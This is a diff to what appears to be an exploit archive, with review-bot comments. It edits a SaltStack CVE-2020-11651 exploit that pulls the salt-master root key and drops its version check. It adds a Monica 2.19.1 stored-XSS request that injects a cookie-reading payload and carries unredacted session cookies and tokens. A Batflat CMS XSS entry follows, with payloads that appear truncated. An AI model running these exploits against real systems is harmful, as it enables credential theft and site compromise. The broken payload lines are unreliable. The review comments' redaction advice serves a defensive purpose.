diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt
index 5bd051b35..6aa455263 100644
--- a/exploits/multiple/remote/48421.txt
+++ b/exploits/multiple/remote/48421.txt
@@ -48,16 +48,6 @@ def init_minion(master_ip, master_port):
# --- check funcs ----
-def check_salt_version():
- print("[+] Salt version: {}".format(salt.version.__version__))
-
- vi = salt.version.__version_info__
-
- if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
- return True
- else:
- return False
-
def check_connection(master_ip, master_port, channel):
print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
sys.stdout.flush()
@@ -74,21 +64,21 @@ def check_connection(master_ip, master_port, channel):
def check_CVE_2020_11651(channel):
print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
sys.stdout.flush()
- # try to evil
+
try:
rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
- except salt.exceptions.SaltReqTimeoutError:
- print("YES")
except:
- print("ERROR")
- raise
+ print('ERROR')
+ return None
else:
- pass
+ pass
finally:
if rets:
+ print('YES')
root_key = rets[2]['root']
return root_key
+ print('NO')
return None
def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
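Review bot: In check_CVE_2020_11651, `rets` is never assigned when `channel.send` raises, so the `if rets:` test under `finally:` fails with UnboundLocalError right after the new handler prints 'ERROR', and the intended `return None` is lost. Initialise it before the `try:` with `rets = None`. The bare `except:` also catches KeyboardInterrupt and SystemExit; `except Exception:` would keep Ctrl-C working. Indentation is not visible in this view, so this reading assumes `if rets:` is the body of `finally:`, which the syntax requires. A timeout used to print YES and now reports ERROR; if that is intended, a comment such as `# a timeout is no longer treated as a positive result` would record it.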
@@ -334,18 +324,11 @@ def main():
channel = init_minion(args.master_ip, args.master_port)
- if check_salt_version():
- print("[ ] This version of salt is vulnerable! Check results below")
- elif args.force:
- print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.")
- else:
- sys.exit()
-
check_connection(args.master_ip, args.master_port, channel)
root_key = check_CVE_2020_11651(channel)
if root_key:
- print('\n[*] root key obtained: {}'.format(root_key))
+ print('[*] root key obtained: {}'.format(root_key))
else:
print('[-] Failed to find root key...aborting')
sys.exit(127)
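Review bot: The value printed by `print('[*] root key obtained: {}'.format(root_key))` is the salt-master's root key, a credential, and it goes to stdout unmasked, so it lands in terminal scrollback and any captured log of a check run. I would add a comment above that line, `# root_key is a master credential: keep this output out of shared logs and tickets`, or print only a short prefix of it. With the version gate removed, `args.force` is no longer read in this hunk; if the option is still declared in the argument parser (not visible here), it is now dead and should be dropped. main() starts and ends outside the hunk.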
diff --git a/exploits/multiple/webapps/49582.txt b/exploits/multiple/webapps/49582.txt
new file mode 100644
index 000000000..373791be2
--- /dev/null
+++ b/exploits/multiple/webapps/49582.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS
+# Date: 22-02-2021
+# Exploit Author: BouSalman
+# Vendor Homepage: https://www.monicahq.com/
+# Software Link: https://github.com/monicahq/monica/releases
+# Version: Monica 2.19.1
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2021-27370
+
+POST /people HTTP/1.1
+Host: 192.168.99.162
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+Origin: http://192.168.99.162
+Connection: close
+Referer: http://192.168.99.162/people/add
+Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D
+Upgrade-Insecure-Requests: 1
+
+_token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true
\ No newline at end of file
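Review bot: The captured request publishes full session material on its `Cookie:` line (`remember_web_…`, `laravel_token`, `XSRF-TOKEN`, `laravel_session`) and in the `_token` form field. Even though the host is a private lab address, these should be replaced with placeholders such as `laravel_session=<redacted>` before the entry is committed. The entry also has no prose saying where the stored `last_name` value is rendered or which release fixes it, so a reader cannot confirm remediation from this file alone. A short line after the header block, for example `# Affected: contact creation form, last_name field; fixed in <version — confirm with vendor>`, would cover that.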
diff --git a/exploits/php/webapps/49583.txt b/exploits/php/webapps/49583.txt
new file mode 100644
index 000000000..5551a32ac
--- /dev/null
+++ b/exploits/php/webapps/49583.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
+# Date: 22/02/2021
+# Exploit Author: Tadjmen
+# Vendor Homepage: https://batflat.org/
+# Software Link: https://github.com/sruupl/batflat/archive/master.zip
+# Version: 1.3.6
+# Tested on: Xammpp on Windows, Firefox Newest
+# CVE : N/A
+
+Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
+
+Login with editor account with rights to Navigation, Galleries, Snippets
+
+Navigation
+- Add link
+payload: ">
+
+Galleries
+- Add gallery
+payload: mlem">